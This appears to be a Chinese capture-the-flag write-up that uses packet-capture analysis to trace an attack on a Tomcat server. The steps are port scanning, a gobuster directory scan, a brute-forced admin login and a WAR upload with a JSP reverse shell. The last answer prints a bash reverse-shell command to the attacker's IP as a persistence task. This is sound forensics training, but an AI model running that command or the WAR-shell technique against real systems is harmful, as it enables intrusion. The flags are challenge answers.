1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag
我们查看流量包,可以发现有一个外部IP在对常见端口进行SYN扫描,判断出为恶意IP
flag{14.0.0.120}
2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag
我们得知IP可以进行溯源,查找IP所在地.flag{guangzhou}
3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag
从流量来看访问的是8080端口的tomcat
flag{8080}
4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag
可以发现是在扫目录
在UA头中可以发现是用gobuster扫的,所以拿到flag{gobuster}
已经分析出来是访问的tomcat,tomcat的常见攻击方法就是上传带有shell的war包,这里我们找到了一个,提取出来然后解压,发现带有一个JSP文件,分析一下源码
可以看出来是反弹sshell的脚本,通常反弹shell用netcat来进行监听,我们尝试提交一下flag{netcat}成功了
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag
tomcat的账号密码存放在Authorization中,username:password--base64编码,Authorization: Basic MTIzOjQ1Ng==,这样的格式,我们直接搜Basic即可找到爆破的流量
我们可以看到有 多个爆破的流量,都是401,只有这一个是200,所以判断出这个爆破成功了,我们对其进行解码拿到flag{admin-tomcat}
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag
可以看到传的带有shell的war包,得到flag{JXQOZY.war}
7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息
我的思路是打进去的第一件事都应该是执行whoami,所以我在流量包中找有没有包含whoami的,结果找到了,可以发现最后在反弹shell,所以我们拿到了最后一个flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}
